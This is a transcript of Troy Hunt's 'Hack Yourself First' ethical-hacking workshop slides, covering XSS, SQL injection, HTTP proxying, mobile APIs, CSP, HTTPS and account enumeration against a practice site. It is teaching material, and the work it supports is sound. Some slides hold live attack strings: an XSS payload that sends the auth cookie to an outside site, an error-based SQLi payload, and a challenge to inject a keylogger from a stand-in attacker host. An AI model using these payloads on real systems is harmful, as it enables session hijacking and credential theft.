Learn Ethical Hacking with Troy Hunt - Hands-on Exercises

hack yourself first n.w
1 / 46
Embed
Share

Dive into the world of ethical hacking with Troy Hunt's practical exercises. Discover risks, use HTTP proxies, and more to enhance your cybersecurity skills. Get ready to tackle challenges and protect your digital assets.

  • Ethical Hacking
  • Cybersecurity
  • Troy Hunt
  • Exercises
  • Online Learning
rayaanacharya
hano262 Follow

Uploaded on | 0 Views

Download Presentation

Please find below an Image/Link to download the presentation.

The content on the website is provided AS IS for your information and personal use only. It may not be sold, licensed, or shared on other websites without obtaining consent from the author. If you encounter any issues during the download, it is possible that the publisher has removed the file from their server.

You are allowed to download the files provided on this website for personal or commercial use, subject to the condition that they are used lawfully. All files are the property of their respective owners.

Download Presentation

The content on the website is provided AS IS for your information and personal use only. It may not be sold, licensed, or shared on other websites without obtaining consent from the author.

E N D

Presentation Transcript

  1. Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com

  2. Were gonna turn you into lean, mean hacking machines!

  3. Because if we dont, these kids are going to hack you Jake Davies, 19 (and his mum) Ryan Cleary, 20 (and his mum) Curtis Gervais, 16, awaiting trial (probably with his mum)

  4. Who are we protecting our assets from? Hacker Resources $10.8B per annum Can invest where ROI makes sense Pocket money Hacker Competency Bored kids Common Thieves Super Hackers

  5. Your Hacker Tools for Today A Wi-Fi connection A mobile device you can configure a proxy on I have a few spares Google Chrome Or another browser with good dev tools Fiddler getfiddler.com Or another HTTP proxy like charlesproxy.com

  6. What well be covering on day 1 Introduction 30 mins Discovering risks via the browser 30 mins Using an HTTP proxy 30 mins Break 15 mins XSS 50 mins SQL injection part 1 55 mins Lunch 1 hour Mobile APIs 60 mins Content Security Policy 50 mins Break 15 mins Account Enumeration 30 mins HTTPS 55 mins Close 09:00 09:30 10:00 10:30 10:45 11:35 12:30 13:30 14:30 15:20 15:35 16:05 17:00

  7. Exercise 1 Discovering risks via the browser

  8. Exercise 1 Chrome developer tools Familiarise yourself with the dev tools Elements, network, cookies, console, por uh, incognito Create an account at hackyourselffirst.troyhunt.com Hacker Challenge 1: Identify three security risks with the registration process

  9. Exercise 2 Using an HTTP proxy

  10. Exercise 2 Using an HTTP proxy Familiarise yourself with Fiddler Watch requests and their headers, review response body and headers, use the composer to reissue request Hacker Challenge 2: Use Fiddler to vote multiple times on 1 car with your ID

  11. Exercise 3 Reflected cross site scripting (XSS)

  12. Understanding XSS mysite.com/?q=<script>alert('Yay XSS!');</script> mysite.com/?q=ferrari <p>You searched for <%= Request.QueryString["q"] %></p> <p>You searched for <script>alert('Yay XSS!');</script></p> <p>You searched for ferrari</p>

  13. Some quick XSS tips Check the encoding context You encode for HTML differently than for JavaScript Check the encoding consistency Often it s manual and some characters are not encoded Play with JavaScript to: Manipulate the DOM, access cookies, load external resources

  14. Exercise 3 XSS Establish the encoding practices on the search page What s encoded, what s not, what contexts are encoding What can be accessed or manipulated in the DOM Hacker Challenge 3: Create an XSS attack that sends the auth cookie to another site

  15. Exercise 3 solution http://hackyourselffirst.troyhunt.com/Search?searchTerm= ');document.location='http://www.troyhunt.com/?c='%2bdocument .cookie;//

  16. Exercise 4 SQL injection (SQLi)

  17. Understanding SQLi mysite.com/?id=foo mysite.com/?id=1 var query = "SELECT * FROM Widget WHERE Id = " query += Request.Query["id"] SELECT * FROM Widget WHERE Id = foo SELECT * FROM Widget WHERE Id = 1 Invalid column name 'foo'

  18. Some quick SQLi tips Think of SQL commands which disclose structure sys.tables, sys.columns, system commands Consider how you d enumerate through records Select top x rows asc then top 1 rows from that desc Write out how you think the query works internally SELECT * FROM Supercar ORDER BY [URL param]

  19. Exercise 4 SQLi Explore the database using error-based SQLi Construct strings to disclose internal data Cast things to invalid types to disclose via exceptions Hacker Challenge 4: Discover the version of the DB

  20. Exercise 4 solution http://hackyourselffirst.troyhunt.com/Make/1 ?orderby=@@VERSION*1

  21. Exercise 5 Mobile APIs

  22. Understanding mobile APIs

  23. Who are we protecting our APIs from?

  24. Trusting the Fiddler root cert http://ipv4.fiddler:8888

  25. Some quick mobile API tips Look at the HTTP requests for sensitive data Credentials, account info, PII Remove the proxy s root cert and make HTTPS requests Is cert validation actually enabled in the app? In your own apps: Parameter tampering, auth bypass, direct object refs

  26. Exercise 5 Mobile APIs Proxy your device through Fiddler or Charles Inspect the traffic of your apps Perform normal activities and monitor requests Hacker Challenge 5: Find three things of interest doesn t have to be security related

  27. Exercise 6 FiddlerScript

  28. Understanding FiddlerScript Highlight particular request / response patterns Modify requests or responses in transit Good representation of what can be done with intercepted traffic Also great for causing apps to misbehave !

  29. Some quick FiddlerScript tips Make good use of the FiddlerScript CookBook Google it first result Wrap conditions around response parsing for better perf Host name / path / content type / method Don t forget to hit the Save Script button! Plus debugging can be painful

  30. Exercise 6 FiddlerScript Modify the traffic returned to your app Identify request / response patterns of an app Manipulate request / response to cause misbehaviour Hacker Challenge 6: Proxy your mobile device and cause one of your apps to do something interesting

  31. Exercise 7 Content Security Policy (CSP)

  32. Without a CSP Anything can be added to the page via a reflected XSS risk Anything can be added to the DOM downstream of the server and you have no idea when this one is happening!

  33. With a CSP The browser will only load resources you white-list Local resources Remote resources Any violations can be reported If you re nervous, you always just report and not block

  34. Some quick CSP tips Create a white list of what should be allowed to run Start with nothing and see what breaks In development! Use the report feature to track exceptions You ll learn some interesting things

  35. Exercise 7 CSP Falafel needs help! They have no CSP and they re a financial institution! We can add one ourselves in transit Hacker Challenge 7: Write a CSP for a site and embed it using FiddlerScript

  36. Injecting the CSP header if (oSession.HostnameIs("www.americanexpress.com")) { oSession.oResponse.headers["Content-Security-Policy"] = ; }

  37. Exercise 8 HTTPS

  38. Understanding HTTPS Confidentiality Integrity Authenticity

  39. Some quick HTTPS tips Consider everything sent over HTTP to be compromised Sometimes that won t matter much Also look at HTTPS content embedded in untrusted pages Iframes Links to HTTPS

  40. Exercise 8 HTTPS You can t trust insecure login forms! The form can be manipulated in transit Manipulate it to capture the secure credentials in transit Hacker Challenge 8: Inject a JavaScript keylogger into an insecure login page using Fiddler script

  41. Injecting the keylogger evilcyberhacker.com/keylogger.js Set the destination JavaScript variable

  42. Exercise 9 Account enumeration

  43. Understanding account enumeration Does john@gmail.com have an account? No Does mary@gmail.com have an account? No Does max@gmail.com have an account? Yes

  44. Some quick account enumeration tips There are usually multiple vectors for identifying the existence of an account There may or may not be anti-automation defence And it may be inconsistent across vectors It may or may not even matter Very dependent on the nature

  45. Exercise 9 Account enumeration Identify vectors for account enumeration Think about how to ask the site about an account Identify positive versus negative responses Hacker Challenge 9: Identify 3 sites you use that disclose the presence of your account

Related


Jury Qualifications and Exemptions in Hunt County Court at Law 2

Jury Qualifications and Exemptions in Hunt County Court at Law 2

lottie
Florida Constitution: A Scavenger Hunt

Florida Constitution: A Scavenger Hunt

violetta
Adventure in the Wild: Going on a Bear Hunt

Adventure in the Wild: Going on a Bear Hunt

ashlynn
Interactive Learning Activity: We're Going on a Bear Hunt

Interactive Learning Activity: We're Going on a Bear Hunt

miley
Virtual Scavenger Hunt - Fun Game with Riddles and Clues

Virtual Scavenger Hunt - Fun Game with Riddles and Clues

jefferson
Explore Careers Library: Treasure Hunt for Exciting Career Paths

Explore Careers Library: Treasure Hunt for Exciting Career Paths

ivie
Garden Scavenger Hunt Adventures!

Garden Scavenger Hunt Adventures!

louetta
Analysis of Sir Thomas Wyatt's Poem

Analysis of Sir Thomas Wyatt's Poem "Whoso List to Hunt

rebeka
Sir Thomas Wyatt and the Poem

Sir Thomas Wyatt and the Poem "Whoso List to Hunt

arame
Interactive Scavenger Hunt in Boston's Historical Sites

Interactive Scavenger Hunt in Boston's Historical Sites

cyus162
We're Going on a Bear Hunt - Interactive Story with Images

We're Going on a Bear Hunt - Interactive Story with Images

jaianna
Engaging Learning Activities for Digraph 'SH' in Year 2 English Language - Bear Hunt Theme

Engaging Learning Activities for Digraph 'SH' in Year 2 English Language - Bear Hunt Theme

kaes428
Student Handbook Scavenger Hunt

Student Handbook Scavenger Hunt

cmill
Troubleshooting AEP Port Number Display Issue during Call Transfers

Troubleshooting AEP Port Number Display Issue during Call Transfers

cyes305
Declaration of Independence Scavenger Hunt and Discussion

Declaration of Independence Scavenger Hunt and Discussion

ebaue
Melancholic Poetry by Leigh Hunt

Melancholic Poetry by Leigh Hunt

mccarver_a
Conservation Efforts and Controversies Surrounding Harp Seals in Canada

Conservation Efforts and Controversies Surrounding Harp Seals in Canada

jas_cad
Sir Thomas Wyatt and His Poem

Sir Thomas Wyatt and His Poem "Whoso List to Hunt

kruss
AAC Scavenger Hunt Mr. Potato Head and The Garden Exploration

AAC Scavenger Hunt Mr. Potato Head and The Garden Exploration

pad_mcn
DECA Scavenger Hunt Team Sign-up and Website Challenge Instructions

DECA Scavenger Hunt Team Sign-up and Website Challenge Instructions

zymariont
Pre-Algebra Slope Scavenger Hunt Check-Up Assignment

Pre-Algebra Slope Scavenger Hunt Check-Up Assignment

jailin
Onedrive and Office.com Scavenger Hunt: Locate Items and Learn Navigation

Onedrive and Office.com Scavenger Hunt: Locate Items and Learn Navigation

chandon

More Related Content